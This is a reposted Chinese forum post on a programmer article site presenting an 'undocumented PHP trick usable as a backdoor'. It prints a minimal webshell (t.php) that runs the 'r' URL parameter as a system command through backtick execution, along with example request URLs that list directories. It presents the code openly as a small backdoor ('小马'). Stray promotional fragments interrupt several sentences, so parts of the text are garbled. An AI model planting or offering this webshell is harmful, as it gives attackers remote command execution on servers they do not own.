欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  后端开发

<转载>一个官方没公布的php秘籍,可用作后门

程序员文章站 2024-01-31 19:30:40
...
一个官方没有公布的php秘籍,可用作后门

可以看看

http://www.webshell.cc/3303.html

好奇怪的漏洞?

可以当做个小马使用,比较有意思的一个东西

写道
被过滤广告
发现这个也是巧合,我就直接说了吧

//t.php
$test = $_GET['r'];
echo `$test`;
?>大家看看这个代码有木有问题?

这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台! 我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,

信息安全团队 而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键 感叹号!旁边的,

专注信息安全通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://webshell.cc/t.php?r=dir

可以列出目录

http://webshell.cc/t.php?r=echo

我是马儿 D:\web\webshell.cc.php

大家觉得我没有忽悠 就赏点分哈


文章来自: WebShell'S Blog 本文地址:http://www.webshell.cc/3303.html

?

?

?

1 楼 hoodbc 2012-09-13
shell_exec 没有禁用
<转载>一个官方没公布的php秘籍,可用作后门

声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn核实处理。

相关文章

相关视频


网友评论

文明上网理性发言,请遵守 新闻评论服务协议

我要评论
  • <转载>一个官方没公布的php秘籍,可用作后门
  • 专题推荐

    作者信息
    <转载>一个官方没公布的php秘籍,可用作后门

    认证0级讲师

    推荐视频教程
  • <转载>一个官方没公布的php秘籍,可用作后门javascript初级视频教程
  • <转载>一个官方没公布的php秘籍,可用作后门jquery 基础视频教程
  • 视频教程分类